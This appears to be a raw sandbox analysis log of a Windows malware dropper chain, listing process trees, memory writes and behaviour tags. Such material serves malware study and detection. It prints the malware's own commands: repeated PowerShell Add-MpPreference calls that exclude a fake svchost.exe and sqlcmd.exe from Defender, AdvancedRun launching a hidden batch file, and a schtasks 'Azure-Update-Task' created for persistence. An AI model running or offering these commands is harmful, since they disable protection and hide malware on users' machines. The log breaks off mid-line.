PID 2100 wrote to memory of 1580	2100	ultramediaburner.exe	ultramediaburner.tmp
PID 2432 wrote to memory of 4052	2432	Ultra.exe	Lulevugodu.exe
PID 2432 wrote to memory of 4052	2432	Ultra.exe	Lulevugodu.exe
PID 2432 wrote to memory of 1656	2432	Ultra.exe	SHyqaefepynae.exe
PID 2432 wrote to memory of 1656	2432	Ultra.exe	SHyqaefepynae.exe
PID 1580 wrote to memory of 1552	1580	ultramediaburner.tmp	UltraMediaBurner.exe
PID 1580 wrote to memory of 1552	1580	ultramediaburner.tmp	UltraMediaBurner.exe
PID 1656 wrote to memory of 3792	1656	SHyqaefepynae.exe	cmd.exe
PID 1656 wrote to memory of 3792	1656	SHyqaefepynae.exe	cmd.exe
PID 1656 wrote to memory of 4204	1656	SHyqaefepynae.exe	cmd.exe
PID 1656 wrote to memory of 4204	1656	SHyqaefepynae.exe	cmd.exe
PID 3792 wrote to memory of 4256	3792	cmd.exe	Conhost.exe
PID 3792 wrote to memory of 4256	3792	cmd.exe	Conhost.exe
PID 1656 wrote to memory of 4404	1656	SHyqaefepynae.exe	cmd.exe
PID 1656 wrote to memory of 4404	1656	SHyqaefepynae.exe	cmd.exe
PID 1656 wrote to memory of 4456	1656	SHyqaefepynae.exe	cmd.exe
PID 1656 wrote to memory of 4456	1656	SHyqaefepynae.exe	cmd.exe
PID 4204 wrote to memory of 4496	4204	cmd.exe	001.exe
PID 4204 wrote to memory of 4496	4204	cmd.exe	001.exe
PID 4204 wrote to memory of 4496	4204	cmd.exe	001.exe
PID 4404 wrote to memory of 4600	4404	cmd.exe	Conhost.exe
PID 4404 wrote to memory of 4600	4404	cmd.exe	Conhost.exe
PID 4404 wrote to memory of 4600	4404	cmd.exe	Conhost.exe
PID 4456 wrote to memory of 4644	4456	cmd.exe	installer.exe
PID 4456 wrote to memory of 4644	4456	cmd.exe	installer.exe
PID 4456 wrote to memory of 4644	4456	cmd.exe	installer.exe
PID 1656 wrote to memory of 4920	1656	SHyqaefepynae.exe	cmd.exe
PID 1656 wrote to memory of 4920	1656	SHyqaefepynae.exe	cmd.exe
PID 4600 wrote to memory of 5048	4600	Conhost.exe	svchost.exe
PID 4600 wrote to memory of 5048	4600	Conhost.exe	svchost.exe
PID 4600 wrote to memory of 5048	4600	Conhost.exe	svchost.exe
PID 4600 wrote to memory of 5048	4600	Conhost.exe	svchost.exe
PID 4600 wrote to memory of 5048	4600	Conhost.exe	svchost.exe
PID 4600 wrote to memory of 5048	4600	Conhost.exe	svchost.exe
PID 4600 wrote to memory of 5048	4600	Conhost.exe	svchost.exe
PID 4600 wrote to memory of 5048	4600	Conhost.exe	svchost.exe
PID 4600 wrote to memory of 5048	4600	Conhost.exe	svchost.exe
PID 4920 wrote to memory of 5096	4920	cmd.exe	gpooe.exe
PID 4920 wrote to memory of 5096	4920	cmd.exe	gpooe.exe
PID 4920 wrote to memory of 5096	4920	cmd.exe	gpooe.exe
PID 5096 wrote to memory of 4184	5096	gpooe.exe	jfiag3g_gg.exe
PID 5096 wrote to memory of 4184	5096	gpooe.exe	jfiag3g_gg.exe
PID 5096 wrote to memory of 4184	5096	gpooe.exe	jfiag3g_gg.exe
PID 1656 wrote to memory of 4756	1656	SHyqaefepynae.exe	cmd.exe
PID 1656 wrote to memory of 4756	1656	SHyqaefepynae.exe	cmd.exe
PID 4188 wrote to memory of 5012	4188	msiexec.exe	MsiExec.exe
PID 4188 wrote to memory of 5012	4188	msiexec.exe	MsiExec.exe
PID 4188 wrote to memory of 5012	4188	msiexec.exe	MsiExec.exe
PID 4756 wrote to memory of 2196	4756	cmd.exe	google-game.exe
PID 4756 wrote to memory of 2196	4756	cmd.exe	google-game.exe
PID 4756 wrote to memory of 2196	4756	cmd.exe	google-game.exe
PID 2196 wrote to memory of 2432	2196	google-game.exe	rundll32.exe
PID 2196 wrote to memory of 2432	2196	google-game.exe	rundll32.exe
PID 2196 wrote to memory of 2432	2196	google-game.exe	rundll32.exe

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1300

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2748

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2728

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2696

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2520

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2512

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1888

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1392

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1160

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1088

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1000
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Executes dropped EXE
  - Windows security modification
  - Suspicious use of SetThreadContext
  PID:4628
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4144
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6496
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7900
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4652
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    - Blocklisted process makes network request
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    PID:4452
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2720
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6676
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6996
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7032
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7472
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6204
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7348
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7332
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7520
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7616
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3984
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4580
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4776
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2996
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:1360
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5552
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7708
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4276
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:760
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8064
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4820
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4392
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7992
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:380
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1052
- - C:\Users\Admin\AppData\Local\Temp\fda17379-94bf-4900-8e66-badb6e5b664f\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\fda17379-94bf-4900-8e66-badb6e5b664f\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\fda17379-94bf-4900-8e66-badb6e5b664f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    - Executes dropped EXE
    PID:1872
  - - C:\Users\Admin\AppData\Local\Temp\fda17379-94bf-4900-8e66-badb6e5b664f\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\fda17379-94bf-4900-8e66-badb6e5b664f\AdvancedRun.exe" /SpecialRun 4101d8 1872
      4⤵
      Executes dropped EXE
      PID:2876
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:8108
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    - Executes dropped EXE
    PID:7596
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:64
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4564
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5712
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6392
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2788
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2820
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4596
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7056
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1216
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:3188
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4336
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7068
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8148
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7644
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7160
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8116
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5388
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:8072
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6644
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4944
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6344
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6380
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6700
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5372
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:3852
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5908
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7548
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5876
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5200
- - C:\Users\Admin\AppData\Local\Temp\137fcb88-ee22-413a-8736-014f035daff5\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\137fcb88-ee22-413a-8736-014f035daff5\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\137fcb88-ee22-413a-8736-014f035daff5\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    - Executes dropped EXE
    PID:1080
  - - C:\Users\Admin\AppData\Local\Temp\137fcb88-ee22-413a-8736-014f035daff5\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\137fcb88-ee22-413a-8736-014f035daff5\AdvancedRun.exe" /SpecialRun 4101d8 1080
      4⤵
      PID:3276
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:652
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:380
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:6676
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:7992
- C:\Users\Admin\AppData\Roaming\jwtwjbt
  C:\Users\Admin\AppData\Roaming\jwtwjbt
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3464
- - C:\Users\Admin\AppData\Roaming\jwtwjbt
    C:\Users\Admin\AppData\Roaming\jwtwjbt
    3⤵
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:6524
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:6496
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2144
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7880
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7972
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6816
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5600
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7760
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4040
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
